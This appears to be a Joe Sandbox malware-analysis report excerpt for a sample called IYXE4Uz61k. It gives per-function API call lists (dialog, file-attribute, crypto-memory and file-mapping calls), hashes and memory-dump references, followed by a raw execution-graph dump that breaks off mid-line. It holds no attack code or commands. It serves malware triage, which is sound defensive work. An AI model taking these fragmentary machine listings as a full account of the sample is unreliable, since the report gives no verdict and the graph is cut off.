• Opcode ID: 8ed4e452d337d547f43a80e6c56f2d39acb8de68f206e69e52d55524cdcd32e0
• Instruction ID: 95c89a478d0c9c3ca0462476e7b60ec268fc07f9dc22c50a03d0ef8f5115047b
• Opcode Fuzzy Hash: 8ed4e452d337d547f43a80e6c56f2d39acb8de68f206e69e52d55524cdcd32e0
• Instruction Fuzzy Hash: 83E0EC31983B21E7D3615B60AC0DB8A3F58BB15B52F050322FA05A61D0DB648A008BE6
APIs
  • Part of subcall function 0088A699: GetDC.USER32(00000000), ref: 0088A69D
  • Part of subcall function 0088A699: GetDeviceCaps.GDI32(00000000,0000000C), ref: 0088A6A8
  • Part of subcall function 0088A699: ReleaseDC.USER32(00000000,00000000), ref: 0088A6B3
• GetObjectW.GDI32(?,00000018,?), ref: 0088A83C
  • Part of subcall function 0088AAC9: GetDC.USER32(00000000), ref: 0088AAD2
  • Part of subcall function 0088AAC9: GetObjectW.GDI32(?,00000018,?), ref: 0088AB01
  • Part of subcall function 0088AAC9: ReleaseDC.USER32(00000000,?), ref: 0088AB99
Strings
Memory Dump Source
• Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
• Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
Similarity
• API ID: ObjectRelease$CapsDevice
• String ID: (
• API String ID: 1061551593-3887548279
• Opcode ID: a61c3114b9dfc8fb43b17047fb51cd919d8fb1951a7c7766ce87e238eb856cf5
• Instruction ID: 7b7fb20ff2d9baa34eee8b76cec878303fd0ca404c126af6bce2ae4e038d6c23
• Opcode Fuzzy Hash: a61c3114b9dfc8fb43b17047fb51cd919d8fb1951a7c7766ce87e238eb856cf5
• Instruction Fuzzy Hash: A291F171608755AFE714EF25C844A2BBBE9FFC9701F00491EF59AD3260DB30A946CB62
APIs
• __EH_prolog.LIBCMT ref: 008775E3
  • Part of subcall function 008805DA: _wcslen.LIBCMT ref: 008805E0
  • Part of subcall function 0087A56D: FindClose.KERNEL32(00000000,000000FF,?,?), ref: 0087A598
• SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 0087777F
  • Part of subcall function 0087A4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0087A325,?,?,?,0087A175,?,00000001,00000000,?,?), ref: 0087A501
  • Part of subcall function 0087A4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0087A325,?,?,?,0087A175,?,00000001,00000000,?,?), ref: 0087A532
Strings
Memory Dump Source
• Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
• Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
Similarity
• API ID: File$Attributes$CloseFindH_prologTime_wcslen
• String ID: :
• API String ID: 3226429890-336475711
• Opcode ID: c48806e7eebfe8999d8856d3fdd7efd70a4da5358644d5688edd0e7b1ad162fd
• Instruction ID: 4cae317a88fd1240361d3eed6b15277d824331f3ef88a4797f5f9d7ec8d01b14
• Opcode Fuzzy Hash: c48806e7eebfe8999d8856d3fdd7efd70a4da5358644d5688edd0e7b1ad162fd
• Instruction Fuzzy Hash: F2416071805558A9EB25EB68CC95EEEB378FF51300F008096B64DE2096DB749F88CF72
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
• Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
Similarity
• API ID: _wcslen
• String ID: }
• API String ID: 176396367-4239843852
• Opcode ID: 6a6b6eed76b13903f88f82001d29f9bbb47deb71960a2898ded04aa408362257
• Instruction ID: 0fc3d33bfb6d21bb720b4266fe7ca1dc4d47c5353a9169c7a004410a835f4854
• Opcode Fuzzy Hash: 6a6b6eed76b13903f88f82001d29f9bbb47deb71960a2898ded04aa408362257
• Instruction Fuzzy Hash: 6421AE7290470A5ADB32FAA8D845E6EB7ECFFD1754F14042AF680C7241EB65DD4883A3
APIs
• IsWindowVisible.USER32(00010464), ref: 0088DDDC
• DialogBoxParamW.USER32(GETPASSWORD1,00010464,0088B270,?,?), ref: 0088DE18
Strings
Memory Dump Source
• Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
• Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
Similarity
• API ID: DialogParamVisibleWindow
• String ID: GETPASSWORD1
• API String ID: 3157717868-3292211884
• Opcode ID: 1ca48a17a80b0254bbd459fec771937792065a96b9532311977a442ad08e38ef
• Instruction ID: 025df5c19ab4565f7c2bd6f89a92eb2e5b427daac3b02c274688a72bd29650bb
• Opcode Fuzzy Hash: 1ca48a17a80b0254bbd459fec771937792065a96b9532311977a442ad08e38ef
• Instruction Fuzzy Hash: FD112B32600258ABDB11EA38AC02BEF3798FB06351F148165BE49EB1C1C7B4AD84C764
APIs
  • Part of subcall function 0087F2C5: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 0087F2E4
  • Part of subcall function 0087F2C5: GetProcAddress.KERNEL32(008B81C8,CryptUnprotectMemory), ref: 0087F2F4
• GetCurrentProcessId.KERNEL32(?,?,?,0087F33E), ref: 0087F3D2
Strings
• CryptProtectMemory failed, xrefs: 0087F389
• CryptUnprotectMemory failed, xrefs: 0087F3CA
Memory Dump Source
• Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
• Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AddressProc$CurrentProcess
                                                                                                                                                                                                    • String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
                                                                                                                                                                                                    • API String ID: 2190909847-396321323
                                                                                                                                                                                                    • Opcode ID: c8e59bba4ed14e1ad481e79769ff63a8de0a1330dfefc9cab18b11cf548874c5
                                                                                                                                                                                                    • Instruction ID: 86ff0074c199e9c139bee5ef2331937b98e0f5d55864e00830d075962ee5bed2
                                                                                                                                                                                                    • Opcode Fuzzy Hash: c8e59bba4ed14e1ad481e79769ff63a8de0a1330dfefc9cab18b11cf548874c5
                                                                                                                                                                                                    • Instruction Fuzzy Hash: A6110631605629ABEF115F3ADC45A6E3758FF01760F00C126FD09DB35ADA75DE018B91
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _swprintf.LIBCMT ref: 0087B9B8
                                                                                                                                                                                                      • Part of subcall function 00874092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 008740A5
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: __vswprintf_c_l_swprintf
                                                                                                                                                                                                    • String ID: %c:\
                                                                                                                                                                                                    • API String ID: 1543624204-3142399695
                                                                                                                                                                                                    • Opcode ID: ab0f7eb413f002bd25265bd41adb4f5385563151c2c835739cfa576f61ff8c09
                                                                                                                                                                                                    • Instruction ID: ba65d6c135930e68370a6dd378aee7c0c50e836113c285e79780b8e3a4a13ffe
                                                                                                                                                                                                    • Opcode Fuzzy Hash: ab0f7eb413f002bd25265bd41adb4f5385563151c2c835739cfa576f61ff8c09
                                                                                                                                                                                                    • Instruction Fuzzy Hash: F101F563500321799A30BB798C86F6BF7ADFF92770B44C41AF558D6086FB20D85082B2
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 0087E2E8: _swprintf.LIBCMT ref: 0087E30E
                                                                                                                                                                                                      • Part of subcall function 0087E2E8: _strlen.LIBCMT ref: 0087E32F
                                                                                                                                                                                                      • Part of subcall function 0087E2E8: SetDlgItemTextW.USER32(?,008AE274,?), ref: 0087E38F
                                                                                                                                                                                                      • Part of subcall function 0087E2E8: GetWindowRect.USER32(?,?), ref: 0087E3C9
                                                                                                                                                                                                      • Part of subcall function 0087E2E8: GetClientRect.USER32(?,?), ref: 0087E3D5
                                                                                                                                                                                                    • GetDlgItem.USER32(00000000,00003021), ref: 0087135A
                                                                                                                                                                                                    • SetWindowTextW.USER32(00000000,008A35F4), ref: 00871370
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ItemRectTextWindow$Client_strlen_swprintf
                                                                                                                                                                                                    • String ID: 0
                                                                                                                                                                                                    • API String ID: 2622349952-4108050209
                                                                                                                                                                                                    • Opcode ID: a88026ad12318bab95362ca37eeabcb00737f51ad63672eca3830abf98db9b4a
                                                                                                                                                                                                    • Instruction ID: 4dd3a8bfd1d7fc5a786988a880afb358853020a78ee5aed4281671041186a267
                                                                                                                                                                                                    • Opcode Fuzzy Hash: a88026ad12318bab95362ca37eeabcb00737f51ad63672eca3830abf98db9b4a
                                                                                                                                                                                                    • Instruction Fuzzy Hash: CBF08C30144289AADF151F68884EAEA3B68FB04344F04C216FD4CD4EA9CB78CA94AB20
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF,00881101,?,?,0088117F,?,?,?,?,?,00881169), ref: 00880FEA
                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,0088117F,?,?,?,?,?,00881169), ref: 00880FF6
                                                                                                                                                                                                      • Part of subcall function 00876C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00876C54
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • WaitForMultipleObjects error %d, GetLastError %d, xrefs: 00880FFF
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ErrorLastObjectSingleWait__vswprintf_c_l
                                                                                                                                                                                                    • String ID: WaitForMultipleObjects error %d, GetLastError %d
                                                                                                                                                                                                    • API String ID: 1091760877-2248577382
                                                                                                                                                                                                    • Opcode ID: 0661423604a880d0e9c41b5ad7b285607fb2a8dca5af5197e78a6538bf2cd061
                                                                                                                                                                                                    • Instruction ID: 3d8f561303748469054051154bcdca3069e87828f38ca1b2ba81802ddb6000bc
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0661423604a880d0e9c41b5ad7b285607fb2a8dca5af5197e78a6538bf2cd061
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3CD02B31508D2176DE1133285C09C6F7804FB63331F604704F13DE47E5DF1449925293
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,?,0087DA55,?), ref: 0087E2A3
                                                                                                                                                                                                    • FindResourceW.KERNEL32(00000000,RTL,00000005,?,0087DA55,?), ref: 0087E2B1
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: FindHandleModuleResource
                                                                                                                                                                                                    • String ID: RTL
                                                                                                                                                                                                    • API String ID: 3537982541-834975271
                                                                                                                                                                                                    • Opcode ID: 95098487706c032f351210cd82a8606d8fbe7d6a055c00526357c697378b710d
                                                                                                                                                                                                    • Instruction ID: 27c99e479df1bd5f1a34e69e5ca3f7e05660d1cfec786c5f7fb2a26c6c7bbd17
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 95098487706c032f351210cd82a8606d8fbe7d6a055c00526357c697378b710d
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4DC08031240F2066F73017747C0EF437E98BB02B15F05044CB145EA6D1D6E5D540C7E0

                                                                                                                                                                                                    Execution Graph

                                                                                                                                                                                                    Execution Coverage:11.1%
                                                                                                                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                    Signature Coverage:0%
                                                                                                                                                                                                    Total number of Nodes:1560
                                                                                                                                                                                                    Total number of Limit Nodes:45
execution_graph
25306 13bf76 WideCharToMultiByte 25304->25306 25307 138dcc _free 20 API calls 25305->25307 25306->25305 25307->25308 25308->25299 25308->25300 25309->25290 25311 1397e5 _unexpected 38 API calls 25310->25311 25312 13ba34 25311->25312 25330 13bb4e 25312->25330 25314 13ba3c 25339 13b7bb 25314->25339 25317 13ba53 25317->25294 25318 138e06 __vsnwprintf_l 21 API calls 25319 13ba64 25318->25319 25326 13ba96 25319->25326 25346 13bbf0 25319->25346 25322 138dcc _free 20 API calls 25322->25317 25323 13ba91 25356 1391a8 20 API calls __dosmaperr 25323->25356 25325 13bada 25325->25326 25357 13b691 26 API calls 25325->25357 25326->25322 25327 13baae 25327->25325 25328 138dcc _free 20 API calls 25327->25328 25328->25325 25331 13bb5a ___scrt_is_nonwritable_in_current_image 25330->25331 25332 1397e5 _unexpected 38 API calls 25331->25332 25333 13bb64 25332->25333 25337 13bbe8 _abort 25333->25337 25338 138dcc _free 20 API calls 25333->25338 25358 138d24 38 API calls _abort 25333->25358 25359 13ac31 EnterCriticalSection 25333->25359 25360 13bbdf LeaveCriticalSection _abort 25333->25360 25337->25314 25338->25333 25340 134636 __cftof 38 API calls 25339->25340 25341 13b7cd 25340->25341 25342 13b7ee 25341->25342 25343 13b7dc GetOEMCP 25341->25343 25344 13b805 25342->25344 25345 13b7f3 GetACP 25342->25345 25343->25344 25344->25317 25344->25318 25345->25344 25347 13b7bb 40 API calls 25346->25347 25348 13bc0f 25347->25348 25350 13bc60 IsValidCodePage 25348->25350 25353 13bc16 25348->25353 25355 13bc85 __cftof 25348->25355 25349 12fbbc _ValidateLocalCookies 5 API calls 25351 13ba89 25349->25351 25352 13bc72 GetCPInfo 25350->25352 25350->25353 25351->25323 25351->25327 25352->25353 25352->25355 25353->25349 25361 13b893 GetCPInfo 25355->25361 25356->25326 25357->25326 25359->25333 25360->25333 25367 13b8cd 25361->25367 25370 13b977 25361->25370 25364 12fbbc _ValidateLocalCookies 5 API calls 25366 13ba23 25364->25366 25366->25353 25371 13c988 25367->25371 25369 13ab78 __vsnwprintf_l 43 API calls 
25369->25370 25370->25364 25372 134636 __cftof 38 API calls 25371->25372 25373 13c9a8 MultiByteToWideChar 25372->25373 25375 13c9e6 25373->25375 25376 13ca7e 25373->25376 25378 13ca07 __cftof __vsnwprintf_l 25375->25378 25379 138e06 __vsnwprintf_l 21 API calls 25375->25379 25377 12fbbc _ValidateLocalCookies 5 API calls 25376->25377 25380 13b92e 25377->25380 25381 13ca78 25378->25381 25383 13ca4c MultiByteToWideChar 25378->25383 25379->25378 25385 13ab78 25380->25385 25390 13abc3 20 API calls _free 25381->25390 25383->25381 25384 13ca68 GetStringTypeW 25383->25384 25384->25381 25386 134636 __cftof 38 API calls 25385->25386 25387 13ab8b 25386->25387 25391 13a95b 25387->25391 25390->25376 25392 13a976 __vsnwprintf_l 25391->25392 25393 13a99c MultiByteToWideChar 25392->25393 25395 13a9c6 25393->25395 25405 13ab50 25393->25405 25394 12fbbc _ValidateLocalCookies 5 API calls 25396 13ab63 25394->25396 25399 138e06 __vsnwprintf_l 21 API calls 25395->25399 25403 13a9e7 __vsnwprintf_l 25395->25403 25396->25369 25397 13aa30 MultiByteToWideChar 25398 13aa9c 25397->25398 25400 13aa49 25397->25400 25427 13abc3 20 API calls _free 25398->25427 25399->25403 25418 13af6c 25400->25418 25403->25397 25403->25398 25405->25394 25406 13aa73 25406->25398 25410 13af6c __vsnwprintf_l 11 API calls 25406->25410 25407 13aaab 25408 138e06 __vsnwprintf_l 21 API calls 25407->25408 25412 13aacc __vsnwprintf_l 25407->25412 25408->25412 25409 13ab41 25426 13abc3 20 API calls _free 25409->25426 25410->25398 25412->25409 25413 13af6c __vsnwprintf_l 11 API calls 25412->25413 25414 13ab20 25413->25414 25414->25409 25415 13ab2f WideCharToMultiByte 25414->25415 25415->25409 25416 13ab6f 25415->25416 25428 13abc3 20 API calls _free 25416->25428 25419 13ac98 _unexpected 5 API calls 25418->25419 25420 13af93 25419->25420 25423 13af9c 25420->25423 25429 13aff4 10 API calls 3 library calls 25420->25429 25422 13afdc LCMapStringW 25422->25423 25424 12fbbc _ValidateLocalCookies 5 API calls 25423->25424 25425 13aa60 
25424->25425 25425->25398 25425->25406 25425->25407 25426->25398 25427->25405 25428->25398 25429->25422 25520 137f6e 52 API calls 2 library calls 25454 13b49d 6 API calls _ValidateLocalCookies 25482 129580 6 API calls 25501 12c793 102 API calls 4 library calls 25456 12c793 97 API calls 4 library calls 25484 12b18d 78 API calls 23454 12f3b2 23455 12f3be ___scrt_is_nonwritable_in_current_image 23454->23455 23486 12eed7 23455->23486 23457 12f3c5 23458 12f518 23457->23458 23462 12f3ef 23457->23462 23559 12f838 4 API calls 2 library calls 23458->23559 23460 12f51f 23552 137f58 23460->23552 23473 12f42e ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 23462->23473 23497 138aed 23462->23497 23468 12f40e 23470 12f48f 23505 12f953 GetStartupInfoW __cftof 23470->23505 23472 12f495 23506 138a3e 51 API calls 23472->23506 23473->23470 23555 137af4 38 API calls 2 library calls 23473->23555 23476 12f49d 23507 12df1e 23476->23507 23480 12f4b1 23480->23460 23481 12f4b5 23480->23481 23482 12f4be 23481->23482 23557 137efb 28 API calls _abort 23481->23557 23558 12f048 12 API calls ___scrt_uninitialize_crt 23482->23558 23485 12f4c6 23485->23468 23487 12eee0 23486->23487 23561 12f654 IsProcessorFeaturePresent 23487->23561 23489 12eeec 23562 132a5e 23489->23562 23491 12eef1 23496 12eef5 23491->23496 23570 138977 23491->23570 23494 12ef0c 23494->23457 23496->23457 23500 138b04 23497->23500 23498 12fbbc _ValidateLocalCookies 5 API calls 23499 12f408 23498->23499 23499->23468 23501 138a91 23499->23501 23500->23498 23502 138ac0 23501->23502 23503 12fbbc _ValidateLocalCookies 5 API calls 23502->23503 23504 138ae9 23503->23504 23504->23473 23505->23472 23506->23476 23629 120863 23507->23629 23511 12df3d 23678 12ac16 23511->23678 23513 12df46 __cftof 23514 12df59 GetCommandLineW 23513->23514 23515 12dfe6 GetModuleFileNameW SetEnvironmentVariableW GetLocalTime 23514->23515 23516 12df68 23514->23516 23693 114092 23515->23693 23682 12c5c4 23516->23682 23522 12dfe0 23687 12dbde 
23522->23687 23523 12df76 OpenFileMappingW 23525 12dfd6 CloseHandle 23523->23525 23526 12df8f MapViewOfFile 23523->23526 23525->23515 23529 12dfa0 __InternalCxxFrameHandler 23526->23529 23530 12dfcd UnmapViewOfFile 23526->23530 23534 12dbde 2 API calls 23529->23534 23530->23525 23536 12dfbc 23534->23536 23535 1290b7 8 API calls 23537 12e0aa DialogBoxParamW 23535->23537 23536->23530 23538 12e0e4 23537->23538 23539 12e0f6 Sleep 23538->23539 23540 12e0fd 23538->23540 23539->23540 23543 12e10b 23540->23543 23726 12ae2f CompareStringW SetCurrentDirectoryW __cftof _wcslen 23540->23726 23542 12e12a DeleteObject 23544 12e146 23542->23544 23545 12e13f DeleteObject 23542->23545 23543->23542 23546 12e177 23544->23546 23547 12e189 23544->23547 23545->23544 23727 12dc3b 6 API calls 23546->23727 23723 12ac7c 23547->23723 23549 12e17d CloseHandle 23549->23547 23551 12e1c3 23556 12f993 GetModuleHandleW 23551->23556 24049 137cd5 23552->24049 23555->23470 23556->23480 23557->23482 23558->23485 23559->23460 23561->23489 23574 133b07 23562->23574 23566 132a6f 23567 132a7a 23566->23567 23588 133b43 DeleteCriticalSection 23566->23588 23567->23491 23569 132a67 23569->23491 23617 13c05a 23570->23617 23573 132a7d 7 API calls 2 library calls 23573->23496 23575 133b10 23574->23575 23577 133b39 23575->23577 23578 132a63 23575->23578 23589 133d46 23575->23589 23594 133b43 DeleteCriticalSection 23577->23594 23578->23569 23580 132b8c 23578->23580 23610 133c57 23580->23610 23583 132ba1 23583->23566 23585 132baf 23586 132bbc 23585->23586 23616 132bbf 6 API calls ___vcrt_FlsFree 23585->23616 23586->23566 23588->23569 23595 133c0d 23589->23595 23592 133d7e InitializeCriticalSectionAndSpinCount 23593 133d69 23592->23593 23593->23575 23594->23578 23596 133c26 23595->23596 23600 133c4f 23595->23600 23596->23600 23602 133b72 23596->23602 23599 133c3b GetProcAddress 23599->23600 23601 133c49 23599->23601 23600->23592 23600->23593 23601->23600 23607 133b7e ___vcrt_FlsSetValue 23602->23607 23603 133bf3 
23603->23599 23603->23600 23604 133b95 LoadLibraryExW 23605 133bb3 GetLastError 23604->23605 23606 133bfa 23604->23606 23605->23607 23606->23603 23608 133c02 FreeLibrary 23606->23608 23607->23603 23607->23604 23609 133bd5 LoadLibraryExW 23607->23609 23608->23603 23609->23606 23609->23607 23611 133c0d ___vcrt_FlsSetValue 5 API calls 23610->23611 23612 133c71 23611->23612 23613 133c8a TlsAlloc 23612->23613 23614 132b96 23612->23614 23614->23583 23615 133d08 6 API calls ___vcrt_FlsSetValue 23614->23615 23615->23585 23616->23583 23620 13c073 23617->23620 23619 12eefe 23619->23494 23619->23573 23621 12fbbc 23620->23621 23622 12fbc4 23621->23622 23623 12fbc5 IsProcessorFeaturePresent 23621->23623 23622->23619 23625 12fc07 23623->23625 23628 12fbca SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 23625->23628 23627 12fcea 23627->23619 23628->23627 23728 12ec50 23629->23728 23632 1208e7 23634 120c14 GetModuleFileNameW 23632->23634 23739 1375fb 42 API calls __vsnwprintf_l 23632->23739 23633 120888 GetProcAddress 23635 1208b9 GetProcAddress 23633->23635 23638 1208a1 23633->23638 23645 120c32 23634->23645 23639 1208cb 23635->23639 23637 120b54 23637->23634 23640 120b5f GetModuleFileNameW CreateFileW 23637->23640 23638->23635 23639->23632 23641 120c08 CloseHandle 23640->23641 23642 120b8f SetFilePointer 23640->23642 23641->23634 23642->23641 23643 120b9d ReadFile 23642->23643 23643->23641 23646 120bbb 23643->23646 23648 120c94 GetFileAttributesW 23645->23648 23650 120c5d CompareStringW 23645->23650 23651 120cac 23645->23651 23730 11b146 23645->23730 23733 12081b 23645->23733 23646->23641 23649 12081b 2 API calls 23646->23649 23648->23645 23648->23651 23649->23646 23650->23645 23652 120cb7 23651->23652 23654 120cec 23651->23654 23655 120cd0 GetFileAttributesW 23652->23655 23657 120ce8 23652->23657 23653 120dfb 23677 12a64d GetCurrentDirectoryW 23653->23677 23654->23653 23656 11b146 GetVersionExW 23654->23656 23655->23652 23655->23657 23658 
